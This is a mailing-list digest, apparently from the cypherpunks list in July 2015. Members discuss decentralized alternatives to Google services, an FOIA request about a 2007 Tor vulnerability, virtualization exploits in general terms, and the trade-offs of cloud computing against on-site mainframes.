From rysiek at hackerspace.pl Sat Jul 18 09:57:00 2015
From: rysiek at hackerspace.pl (rysiek)
Date: Sat, 18 Jul 2015 18:57 +0200
Subject: an ominous comment
In-Reply-To:
References: <20150714155203.826F52282E2@palinka.tinho.net> <20150716175450.2ECC6680133@frontend2.nyi.internal>
Message-ID: <3509647.IbPOph2uvz@lapuntu>

On Friday, 17 July 2015 00:59:19 Zenaan Harkness wrote:
> On 7/16/15, Shelley wrote:
> > On July 16, 2015 10:24:23 AM "Stephen D. Williams" wrote:
> >> On 7/16/15 7:51 AM, Georgi Guninski wrote:
> >> > On Tue, Jul 14, 2015 at 10:02:31AM -0700, Stephen D. Williams wrote:
> >> >> In a lot of ways, this is an elegant solution and could arguably be
> >> >> much more secure than desktop apps in Windows. Assuming your
> >> >
> >> > Lol, is this positive or negative argument?
> >> >
> >> > it can hardly be less secure than windoze imho.
> >>
> >> Cypherpunks + Windows, what do you think?
> >>
> >> sdw
> >
> > It's making me break out in hives, stop it! :p
> >
> > *shudder*
>
> Windows gives you wiiiings.
inb4 Wingdows -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From cathalgarvey at cathalgarvey.me Sat Jul 18 11:05:21 2015 From: cathalgarvey at cathalgarvey.me (Cathal (Phone)) Date: Sat, 18 Jul 2015 19:05:21 +0100 Subject: Encryption Rights - A Google+ community In-Reply-To: <179659091.PKgjI4HLZx@lapuntu> References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> <179659091.PKgjI4HLZx@lapuntu> Message-ID: <3491C94B-9D92-49B0-B2CF-CB6A92F34647@cathalgarvey.me> Is Twister usable yet? Back when it released in alpha/beta form it was very slow and irregular in updating people's feeds because it was built on libtorrent which scheduled only 10 swarms at any time. The lack of a useful way to pubsub at the network level seemed to limit Twister to small followerships: if I want to follow 300 people, I have to join 300 swarms, plus a blockchain! On 18 July 2015 18:07:19 GMT+01:00, rysiek wrote: >Well, I understand the need for more "social" (for want of better word) > >communication platform than e-mail. For me, this is Twister: >http://twister.net.co/ -- Sent from my Android device with K-9 Mail. Please excuse my brevity. 
From rysiek at hackerspace.pl Sat Jul 18 10:07:19 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 18 Jul 2015 19:07:19 +0200 Subject: Encryption Rights - A Google+ community In-Reply-To: <20150714094523.637C2C00027@frontend1.nyi.internal> References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> Message-ID: <179659091.PKgjI4HLZx@lapuntu> Dnia wtorek, 14 lipca 2015 02:45:39 Shelley pisze: > On July 14, 2015 2:11:35 AM stef wrote: > > On Mon, Jul 13, 2015 at 10:07:57PM -0400, grarpamp wrote: > > > https://plus.google.com/communities/109624826715876091211 > > > Encryption Rights - Protecting Our Rights to Strongly Encrypt > > > By Lauren Weinstein > > > http://www.vortex.com/lauren > > > > but wtf in the middle of the kraakens tentacles? wth do people still trust > > google? even laura. wtf? the mind boggles. > > > > -- > > I'm glad it's not just me! That was my reaction too but I held back from > commenting, because I feel like I'm always bitching here about cpunks or > anyone interested in privacy still using google for any reason. I don't > understand it. +1 here. Well, I understand the need for more "social" (for want of better word) communication platform than e-mail. For me, this is Twister: http://twister.net.co/ -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. 
URL: From rysiek at hackerspace.pl Sat Jul 18 10:09:41 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 18 Jul 2015 19:09:41 +0200 Subject: Executive Director Needed, Tor Project In-Reply-To: References: Message-ID: <1681245.tG9humYGFL@lapuntu> Dnia wtorek, 14 lipca 2015 22:30:51 Griffin Boyce pisze: > Zenaan Harkness wrote: > > On 7/13/15, Griffin Boyce wrote: > >> The Doctor wrote: > >>> Griffin Boyce wrote: > >>>> Whoa whoa whoa. We all know that Vermin Supreme is the community > >>>> favorite to become the next Tor E.D. Juan's got no chance. > >>> > >>> You mean that Adam Weishaupt dropped out of the running? Shame, > >>> that. > >> > >> ^ ▲ illuminati confirmed > > > > Don't know how many times ... illumiNETti. Sheesh. > > /\ > / \ > /,--.\ > /< () >\ > / `--' \ > / dank \ Bitte. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From coderman at gmail.com Sat Jul 18 19:26:33 2015 From: coderman at gmail.com (coderman) Date: Sat, 18 Jul 2015 19:26:33 -0700 Subject: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: this new request i vote most likely to take longest time to fulfill :) "Any and all records, reports, tasking, mitigations, redesigns, post-mortems, and any other responsive materials related to compromise of "Tor" and/or "Tor Browser Bundle" and/or "Tor Vidalia Bundle" leading to breach of NSANet, JWICS, SIPRNet, and also including joint activities with access to FBINet and SCION where compromise of Tor resulted in attacker attaining access to, or potentially gaining access to these networks. Note that Tor may be incorrectly capitalized as "TOR"; please do a case insensitive search. 
Specific date of compromise is between July 30th 2007 and Aug. 2nd 2007; date provided to aid search efforts. CVE assigned to vulnerability is CVE-2007-4174 and provided to aid search efforts. Subject announcing vulnerability is "Tor security advisory: cross-protocol http form attack" and provided to aid search efforts. Please include results spanning the Cryptologic Services Groups, the National Security Operations Center (NSOC), the Information Assurance Directorate, the Research Associate Directorate, the Signals Intelligence Directorate, the Technology Directorate, the NSA/CSS Threat Operations Center (NTOC), and the Office of the Director, including Staff. Search of Covert Network Access technologies employed by Special Intelligence (SI) programs contained within compartmented access constraints is specifically requested, including QUANTUMTHEORY and related covert programs requiring covert Internet access. Please provide processing notes for this request, even if denied in part. Thank you!" - https://www.muckrock.com/foi/united-states-of-america-10/backhack-19811/ best regards, From coderman at gmail.com Sat Jul 18 19:53:21 2015 From: coderman at gmail.com (coderman) Date: Sat, 18 Jul 2015 19:53:21 -0700 Subject: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: P.S. 
this just dropped and is awesome :) https://archive.org/details/COMPLETE_FBI_VAULT_FOIA_PDF_ARCHIVES_07_15_15 54GB FBI VAULT FOIA PDF ARCHIVES V1.0 SOURCE: https://vault.fbi.gov ABOUT THIS DOWNLOAD SET (4 PARTS): – four downloadable .zip files uncompress to roughly 54GB total – complete FBI Vault online archives (up to July 15 2015) – meticulous folder structure – all individual PDF files renamed accordingly & logically – utilizes long file/folder names on Mac OS X 10.10.4 – archive created on Mac OS X 10.10.4 – master folders compressed to .zip files via standard system compression utility [SPECIAL NOTE: This version of the archive is much better than the original FBI downloadable components. This took much time to methodically download, compile and cleanup.] FOLDER DIRECTORY: http://pastebin.com/0RcBHjKP From rysiek at hackerspace.pl Sat Jul 18 14:09:21 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 18 Jul 2015 23:09:21 +0200 Subject: Encryption Rights - A Google+ community In-Reply-To: References: <179659091.PKgjI4HLZx@lapuntu> Message-ID: <1967648.u6W7a8k46C@lapuntu> Dnia sobota, 18 lipca 2015 10:55:52 eden pisze: > > +1 here. > > I'm an admin for a lot of groups. Those groups are run on Yahoo, > Google, as well as some that are run on private mailman machines. The > question keeps coming up... what is the alternative? Run your own servers, control your own infrastructure. There are ways to do it. Next on my "ToTest" list is this, for instance: https://github.com/sovereign/sovereign > > Well, I understand the need for more "social" (for want of better word) > > communication platform than e-mail. For me, this is Twister: > > http://twister.net.co/ > > This looks very interesting. Thank you, i will have to look into it. 
> > But, back to the question: How/where can someone run a simple > (ignoring the sign-up required by Yahoo/Google/etc.), public, free > (both ways, because paying would require identification) forum, > allowing for anonymous posts (but not allowing it to be overrun by > trolls), that has a simple searchable (and findable - as in searched > by Google, Yahoo, etc.) archive? The question is not price; the question is whether you are aware that you're always paying in hard cash or private data. If you value your data you will find the cash. > You still have to trust a privately run forum. Trust, as in, will > it be censored, altered, still there after the volunteer gets tired of > it, etc.? Run your own forum, or use something like Twister -- censorship doesn't really seem possible there. > In other words, if you want a private discussion group about > Privacy, then yes, keep it small and secret... somehow. But if you > want a public discussion, what are the alternatives to > Google/Yahoo/etc.? Get more people off of Google/Yahoo/etc. There's also The Federation: http://the-federation.info/ You can even set up more pods/servers. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Sat Jul 18 14:16:35 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 18 Jul 2015 23:16:35 +0200 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: References: <559cd699.c511370a.4f2c6.2444@mx.google.com> Message-ID: <7049550.bpsJSTxgSn@lapuntu> Dnia niedziela, 19 lipca 2015 02:36:56 Lodewijk andré de la porte pisze: > 2015-07-08 16:52 GMT+09:00 Juan : > > Damn! You grarpamp and your pals who 'own'the government, > > should have told your servants not to do that. 
What happened?? > > They wanted their servants to keep them safe :) This is actually a very good comment on democracy. "If you want to stay safe, don't rely on your servants to keep you safe." -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From zen at freedbms.net Sat Jul 18 17:42:47 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sun, 19 Jul 2015 00:42:47 +0000 Subject: an ominous comment In-Reply-To: <55AA8B5E.1040202@lig.net> References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: On 7/18/15, Stephen D. Williams wrote: > I feel perfectly confident that Google is going to > protect their billions in income and valuation by being very > careful with avoiding abusing their data or users in any strong sense. Wellp, see here now sonny ... a little bit of gennel abuse now, that's ok now ya here me son? Just a little slap if she says no 'll bring her right into line, and short or long of that, these here 4 gennel silky cuffs - tie em reel gennel like, and them users aint ever gonna notice. Once they's hog tied in a nice soft and golden cage of online service, they don't know what data been inserted and sold no where. ... You listenin ta me son?!! . Stop picken your nose! 
From zen at freedbms.net Sat Jul 18 17:58:23 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sun, 19 Jul 2015 00:58:23 +0000 Subject: an ominous comment In-Reply-To: References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net> Message-ID: On 7/18/15, Lodewijk andré de la porte wrote: > 2015-07-19 2:22 GMT+09:00 Stephen D. Williams : > >> I feel perfectly confident that Google is going to protect their billions >> in income and valuation by being very careful with avoiding abusing their >> data or users in any strong sense. > > > I want to say "You're new here, aren't you?", but I know you're not. > Parallel construction and intelligence laundering take care of this in case > they want to abuse your data. Big Data is never very much of a privacy > issue, but when they silently use that Big Data for their (or their > companies') profit, well, without competition you'll lose. And then there's > straight business-secret-stealing, which they also do, and which is very > hard to ever find out about (parallel construction is also possible here). > > So, yeah, they'll protect their billions in income and valuation. > And they'll use all the intelligence the US can bring Oh how I wish that were true. > to the table to do it. 
Timeless as ever - Party in the CIA (Weird Al Yankovic):
https://www.youtube.com/watch?v=C-CG5w4YwOI

From odinn.cyberguerrilla at riseup.net Sun Jul 19 01:00:48 2015
From: odinn.cyberguerrilla at riseup.net (odinn)
Date: Sun, 19 Jul 2015 01:00:48 -0700
Subject: Encryption Rights - A Google+ community
In-Reply-To: <3491C94B-9D92-49B0-B2CF-CB6A92F34647@cathalgarvey.me>
References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> <179659091.PKgjI4HLZx@lapuntu> <3491C94B-9D92-49B0-B2CF-CB6A92F34647@cathalgarvey.me>
Message-ID: <55AB5930.70500@riseup.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Those who are following this list probably know these options already, but it bears repeating in case a reader has not yet checked one of these out:

Diaspora (http://podupti.me), Twister (http://twister.net.co/), TrsstProject (https://github.com/TrsstProject/trsst/releases)

And of course, don't forget bitmessage (or pybitmessage available on linux) https://bitmessage.org/wiki/Main_Page

On 07/18/2015 11:05 AM, Cathal (Phone) wrote:
> Is Twister usable yet? Back when it released in alpha/beta form it
> was very slow and irregular in updating people's feeds because it
> was built on libtorrent which scheduled only 10 swarms at any
> time.
>
> The lack of a useful way to pubsub at the network level seemed to
> limit Twister to small followerships: if I want to follow 300
> people, I have to join 300 swarms, plus a blockchain!
>
> On 18 July 2015 18:07:19 GMT+01:00, rysiek
> wrote:
>> Well, I understand the need for more "social" (for want of better
>> word)
>>
>> communication platform than e-mail.
For me, this is Twister:
>> http://twister.net.co/
>
- --
http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good"
https://keybase.io/odinn

From l at odewijk.nl Sat Jul 18 10:32:53 2015
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Sun, 19 Jul 2015 02:32:53 +0900
Subject: an ominous comment
In-Reply-To: <55AA8B5E.1040202@lig.net>
References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <55AA8B5E.1040202@lig.net>
Message-ID:

2015-07-19 2:22 GMT+09:00 Stephen D. Williams :

> I feel perfectly confident that Google is going to protect their billions
> in income and valuation by being very careful with avoiding abusing their
> data or users in any strong sense.

I want to say "You're new here, aren't you?", but I know you're not. Parallel construction and intelligence laundering take care of this in case they want to abuse your data. Big Data is never very much of a privacy issue, but when they silently use that Big Data for their (or their companies') profit, well, without competition you'll lose. And then there's straight business-secret-stealing, which they also do, and which is very hard to ever find out about (parallel construction is also possible here).

So, yeah, they'll protect their billions in income and valuation. And they'll use all the intelligence the US can bring to the table to do it.
-------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1297 bytes Desc: not available URL: From l at odewijk.nl Sat Jul 18 10:36:56 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sun, 19 Jul 2015 02:36:56 +0900 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: <559cd699.c511370a.4f2c6.2444@mx.google.com> References: <559cd699.c511370a.4f2c6.2444@mx.google.com> Message-ID: 2015-07-08 16:52 GMT+09:00 Juan : > Damn! You grarpamp and your pals who 'own'the government, > should have told your servants not to do that. What happened?? > They wanted their servants to keep them safe :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 605 bytes Desc: not available URL: From zen at freedbms.net Sat Jul 18 19:44:57 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sun, 19 Jul 2015 02:44:57 +0000 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: <559cd699.c511370a.4f2c6.2444@mx.google.com> References: <559cd699.c511370a.4f2c6.2444@mx.google.com> Message-ID: On 7/8/15, Juan wrote: > On Wed, 8 Jul 2015 03:40:47 -0400 > grarpamp wrote: >> The Senate Intelligence Committee secretly voted on June 24 in favor >> of legislation requiring e-mail providers and social media sites to >> report suspected terrorist activities. The legislation, approved 15-0 >> in a closed-door hearing, remains "classified." The relevant text is >> contained in the 2016 intelligence authorization... > > Damn! You grarpamp and your pals who 'own'the government, > should have told your servants not to do that. What happened?? The legislation will not be television. Shjte, it won't even be published - it's so classified, not even the president is allowed to read it. First they came for the govmint, and I said nothing. Next they came for the currency, and I said nothing. 
Then they came for our freedoms, one by one, and each time I said nothing. At hurricane Katrina they roamed the suburbs and demanded the guns, and every house handed over at least one gun, rather loudly proclaiming "you can take my gun from my warm and very much alive fingers since I never had a real spine anyway". Then they came for me... Paraphrasing 'Atlas Shrugged'. From fw at deneb.enyo.de Sun Jul 19 01:15:38 2015 From: fw at deneb.enyo.de (Florian Weimer) Date: Sun, 19 Jul 2015 10:15:38 +0200 Subject: an ominous comment In-Reply-To: <20150718151551.GA2439@sivokote.iziade.m$> (Georgi Guninski's message of "Sat, 18 Jul 2015 18:15:51 +0300") References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> Message-ID: <877fpwmul1.fsf@mid.deneb.enyo.de> * Georgi Guninski: > You should be aware of the numerous virtualization > sploits -- Xen, Qemu, possibly others. > > Exploiting a virtualization bug is just the fee > "to be in cloud" and I _suspect_ more efforts > are needed for my boxen. Not all service providers hand you the capability to run arbitrary code to run VM exploits, so you have to exploit an application bug first. (And the application may even run on bare metal.) Service providers can also provision VMs in such a way that customers can only attack themselves. From fw at deneb.enyo.de Sun Jul 19 02:20:43 2015 From: fw at deneb.enyo.de (Florian Weimer) Date: Sun, 19 Jul 2015 11:20:43 +0200 Subject: Encryption Rights - A Google+ community In-Reply-To: (eden's message of "Sat, 18 Jul 2015 10:55:52 -0700") References: <20150714090319.GG6906@ctrlc.hu> <20150714094523.637C2C00027@frontend1.nyi.internal> <179659091.PKgjI4HLZx@lapuntu> Message-ID: <874ml0jyfo.fsf@mid.deneb.enyo.de> * eden: > I'm an admin for a lot of groups. Those groups are run on Yahoo, > Google, as well as some that are run on private mailman machines. The > question keeps coming up... what is the alternative? 
Mailman 3? It is supposed to offer an interface which appeals more to casual users not entirely comfortable with email, while at the same time offering complete email integration. I've also seen Discourse instances which look quite useful, but I'm not a regular user on such platforms to tell how it works out in practice. From rysiek at hackerspace.pl Sun Jul 19 02:34:39 2015 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 19 Jul 2015 11:34:39 +0200 Subject: an ominous comment In-Reply-To: <877fpwmul1.fsf@mid.deneb.enyo.de> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150718151551.GA2439@sivokote.iziade.m$> <877fpwmul1.fsf@mid.deneb.enyo.de> Message-ID: <8078897.RstFYr029M@lapuntu> Dnia niedziela, 19 lipca 2015 10:15:38 Florian Weimer pisze: > * Georgi Guninski: > > You should be aware of the numerous virtualization > > sploits -- Xen, Qemu, possibly others. > > > > Exploiting a virtualization bug is just the fee > > "to be in cloud" and I _suspect_ more efforts > > are needed for my boxen. > > Not all service providers hand you the capability to run arbitrary > code to run VM exploits, so you have to exploit an application bug > first. (And the application may even run on bare metal.) > > Service providers can also provision VMs in such a way that customers > can only attack themselves. I consider service providers' access to my data a problem in and of itself. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. 
URL:

From fw at deneb.enyo.de Sun Jul 19 04:21:41 2015
From: fw at deneb.enyo.de (Florian Weimer)
Date: Sun, 19 Jul 2015 13:21:41 +0200
Subject: an ominous comment
In-Reply-To: <8078897.RstFYr029M@lapuntu> (rysiek@hackerspace.pl's message of "Sun, 19 Jul 2015 11:34:39 +0200")
References: <20150714155203.826F52282E2@palinka.tinho.net> <20150718151551.GA2439@sivokote.iziade.m$> <877fpwmul1.fsf@mid.deneb.enyo.de> <8078897.RstFYr029M@lapuntu>
Message-ID: <874ml0gzp6.fsf@mid.deneb.enyo.de>

> I consider service providers' access to my data a problem in and of itself.

Sure, this is a valid position. But as we have seen, most organizations do a poor job of controlling their data in-house. Right now, an external service provider can often exceed quite easily the data controls such organizations can provide, and that alone might make it a net win to move the data off premises.

From guninski at guninski.com Sun Jul 19 06:54:45 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Sun, 19 Jul 2015 16:54:45 +0300
Subject: an ominous comment
In-Reply-To: <877fpwmul1.fsf@mid.deneb.enyo.de>
References: <20150714155203.826F52282E2@palinka.tinho.net> <871tg5puda.fsf@mid.deneb.enyo.de> <20150718151551.GA2439@sivokote.iziade.m$> <877fpwmul1.fsf@mid.deneb.enyo.de>
Message-ID: <20150719135445.GA2524@sivokote.iziade.m$>

On Sun, Jul 19, 2015 at 10:15:38AM +0200, Florian Weimer wrote:
> * Georgi Guninski:
>
> > You should be aware of the numerous virtualization
> > sploits -- Xen, Qemu, possibly others.
> >
> > Exploiting a virtualization bug is just the fee
> > "to be in cloud" and I _suspect_ more efforts
> > are needed for my boxen.
>
> Not all service providers hand you the capability to run arbitrary
> code to run VM exploits, so you have to exploit an application bug
> first. (And the application may even run on bare metal.)
>
> Service providers can also provision VMs in such a way that customers
> can only attack themselves.

Really?
Isn't this too expensive for times of crisis like this?

Anyway, me conjecture that there are plenty of bugs alive.

From coderman at gmail.com Sun Jul 19 18:10:14 2015
From: coderman at gmail.com (coderman)
Date: Sun, 19 Jul 2015 18:10:14 -0700
Subject: No subject
Message-ID:

joined the twitters recently, noticed that many of my posts attract "favorite'ers" who are honey pots. E.g.:

- https://twitter.com/AudreySykestfm
- https://twitter.com/EvelynHarri0pp
- https://twitter.com/PenelopeRosap8
- https://twitter.com/AdalynEsteskul
- https://twitter.com/PazhetnykhMiss
- https://twitter.com/helensmithusacc
- https://twitter.com/RubyFlemingdy5
- https://twitter.com/KaelynMorenm2g
- https://twitter.com/PeytonKanee97
- https://twitter.com/LilyArnoldvkm

maybe social research, or ... ? i guess they think i've got a type :P

best regards,
not interested codermange

From juan.g71 at gmail.com Sun Jul 19 14:16:45 2015
From: juan.g71 at gmail.com (Juan)
Date: Sun, 19 Jul 2015 18:16:45 -0300
Subject: an ominous comment
In-Reply-To: <874ml0gzp6.fsf@mid.deneb.enyo.de>
References: <20150714155203.826F52282E2@palinka.tinho.net> <20150718151551.GA2439@sivokote.iziade.m$> <877fpwmul1.fsf@mid.deneb.enyo.de> <8078897.RstFYr029M@lapuntu> <874ml0gzp6.fsf@mid.deneb.enyo.de>
Message-ID: <55ac1378.9a2a370a.978c9.5ddd@mx.google.com>

On Sun, 19 Jul 2015 13:21:41 +0200 Florian Weimer wrote:

> > I consider service providers' access to my data a problem in and of
> > itself.
>
> Sure, this is a valid position. But as we have seen, most
> organizations do a poor job of controlling their data in-house.

Of course. People can't govern themselves or manage their own data. That's why we need jesus, google and the NSA.

> Right
> now, an external service provider can often exceed quite easily the
> data controls such organizations can provide, and that alone might
> make it a net win to move the data off premises.
From grarpamp at gmail.com Sun Jul 19 15:47:47 2015 From: grarpamp at gmail.com (grarpamp) Date: Sun, 19 Jul 2015 18:47:47 -0400 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: References: <559cd699.c511370a.4f2c6.2444@mx.google.com> Message-ID: > They wanted their servants to keep them safe :) Don't get it twisted. From sdw at lig.net Sun Jul 19 18:58:18 2015 From: sdw at lig.net (Stephen Williams) Date: Sun, 19 Jul 2015 18:58:18 -0700 Subject: an ominous comment In-Reply-To: <20150720002516.GI27932@nl.grid.coop> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150720002516.GI27932@nl.grid.coop> Message-ID: <55AC55BA.4050603@lig.net> On 7/19/15 5:25 PM, Troy Benjegerdes wrote: > On Tue, Jul 14, 2015 at 11:52:03AM -0400, dan at geer.org wrote: >> Discussing security policy post-OPM debacle in a setting to which >> I have access (sorry to be oblique), it was said by a CxO "We have >> to prepare for the day when no software we depend on is run on >> premises." >> >> I did not handle this well (think sputtering as an alternative to >> white rage). At the same time, I am probably in a bubble in that >> I suspect that nearly everyone I see with a computer (of any form >> factor) is already in that situation or, save for Javascript piped >> in from the cloud to run locally, soon will be -- denizens of this >> list and a few others excepted. >> >> Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, >> perhaps, "Is anything to be done?" >> >> --dan > The same thing we did in the old days. > > Install an IBM mainframe. > > https://www.techwire.net/the-mainframe-lives-on-an-industry-perspective/ > > The only place the 'cloud' makes sense is if you are Amazon or Google > and you want to sell your excess computing capacity to suckers who can't > afford to buy their own computers. 
> > If you actually do capacity planning and maybe do something like apply > modern devops to mainframe platforms, you can actually get some economies > of scale running your mainframe on-site. > > It will probably cost less than what that CxO's got paid under-the-table > in a rigged altcoin pump-and-dump orchestrated by the cloud service > provider. Traditional corporate onsite compute, storage, network, security, software (Oracle etc.) is almost always extremely expensive. While a raw hard drive may be inexpensive, if you buy it in an EMC or mainframe storage array, you are going to pay many multiples more per GB, compute minute, etc. And, if you bought anything more than you actually use, you're being very wasteful. Parts of the cloud revolution are rapid just in time purchase, deployment, change, new scalable methods, etc., but economically, it is often tremendously less expensive than a commercial solution plus the support staff to make it work. In the most efficient traditional local deployment possible, this may not be true initially, but for the vast majority of mediocre corporate IT departments, it is very true. If you are large and/or savvy enough, the thing to do is to borrow cloud system methods and run a cloud for yourself. Currently, that's not completely easy or turnkey. At some point, we should get to a clean utility computing model, but it will take a few more generations of evolution. sdw -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: text/html Size: 3279 bytes Desc: not available URL: From hozer at hozed.org Sun Jul 19 17:25:16 2015 From: hozer at hozed.org (Troy Benjegerdes) Date: Sun, 19 Jul 2015 19:25:16 -0500 Subject: an ominous comment In-Reply-To: <20150714155203.826F52282E2@palinka.tinho.net> References: <20150714155203.826F52282E2@palinka.tinho.net> Message-ID: <20150720002516.GI27932@nl.grid.coop> On Tue, Jul 14, 2015 at 11:52:03AM -0400, dan at geer.org wrote: > Discussing security policy post-OPM debacle in a setting to which > I have access (sorry to be oblique), it was said by a CxO "We have > to prepare for the day when no software we depend on is run on > premises." > > I did not handle this well (think sputtering as an alternative to > white rage). At the same time, I am probably in a bubble in that > I suspect that nearly everyone I see with a computer (of any form > factor) is already in that situation or, save for Javascript piped > in from the cloud to run locally, soon will be -- denizens of this > list and a few others excepted. > > Echoing Lenin echoing Chernyshevsky, "What is to be done?" or, > perhaps, "Is anything to be done?" > > --dan The same thing we did in the old days. Install an IBM mainframe. https://www.techwire.net/the-mainframe-lives-on-an-industry-perspective/ The only place the 'cloud' makes sense is if you are Amazon or Google and you want to sell your excess computing capacity to suckers who can't afford to buy their own computers. If you actually do capacity planning and maybe do something like apply modern devops to mainframe platforms, you can actually get some economies of scale running your mainframe on-site. It will probably cost less than what that CxO's got paid under-the-table in a rigged altcoin pump-and-dump orchestrated by the cloud service provider. 
From sdw at lig.net Sun Jul 19 19:53:35 2015 From: sdw at lig.net (Stephen Williams) Date: Sun, 19 Jul 2015 19:53:35 -0700 Subject: an ominous comment In-Reply-To: <20150720021318.GJ27932@nl.grid.coop> References: <20150714155203.826F52282E2@palinka.tinho.net> <20150720002516.GI27932@nl.grid.coop> <55AC55BA.4050603@lig.net> <20150720021318.GJ27932@nl.grid.coop> Message-ID: <55AC62AF.1010904@lig.net> On 7/19/15 7:13 PM, Troy Benjegerdes wrote: > On Sun, Jul 19, 2015 at 06:58:18PM -0700, Stephen Williams wrote: >> .. >> If you are large and/or savvy enough, the thing to do is to borrow >> cloud system methods and run a cloud for yourself. Currently, >> that's not completely easy or turnkey. At some point, we should get >> to a clean utility computing model, but it will take a few more >> generations of evolution. >> >> sdw >> > IBM would tell you the z13 is the best platform to run a cloud on. > Claims are you get 8000 or so cloud servers per machine [1]. I'm > sure fujitsu or some other vendor will sell you something equally > expensive in the same 'mainframe' class that can virtualize like > that. > > A lot of what I hear about 'cloud' and virtualization are things that > were first deployed in 1970's-ish on mainframes. > > Now, you're absolutely right that a 1TB hard drive that has been > qualified to work with that machine will cost about 10x what you can > get at staples. It's 10x for the drive, another 10x for the box to put it in, another 10x for a license for the software to get to it, ... (Roughly. ;-) ) You can be nickle and dimed up front or over time. In the latter case, it will continue to get more competitive and begin to have local systems with the same characteristics. How much does an additional 4TB of storage for a z13 cost? 
> But the point about mainframes is they are built to have lots of > *memory bandwidth*, and a 'compute minute' on a Z13 is going to process > a lot more transactions and write them reliably to that overpriced > disk than any cloud solution is ever going to do. Most cloud systems fall into the embarrassingly parallel category. Many smaller, cheaper, cooler units completely outclass, in price and scalability, bigger, faster, higher bandwidth solutions, unless those are built inexpensively with smaller, cheaper, cooler units. We're finding out whether medium sized (Intel/AMD desktop / server class CPUs) or small (ARM mobile chipsets) are going to scale better, but either way, a many node system has an aggregate memory bandwidth that dwarfs old-style mega CPU systems. It's not clear, but it appears that the z13 is just an integrated cloud-style clustered system with a bunch of nice added features[2]. If so, which is the only way it could compete on scale and cost, it is a branded cloud system. Would it really be less expensive to operate than an Open Compute local cloud? Probably only if you made a lot of assumptions about overhead, etc. The z13 looks cool, and has a lot of interesting features. It will be interesting to see how it does. > You just have to be ready to write a check for a couple of million > if you want one of these things on-site, and that's why the cloud > exists, for the folks that either don't have that kind of money, or > don't understand why they should spend it up-front, instead of getting > nickel and dimed to death by cloud vendors and their hackers. If you have the type of business where you know what you need and how much of it you need, you can competitively provision a local solution, although there are still plenty of ways to go wrong. And many do, IMHO. Many businesses have relatively modest needs, don't know what their growth will look like, etc. 
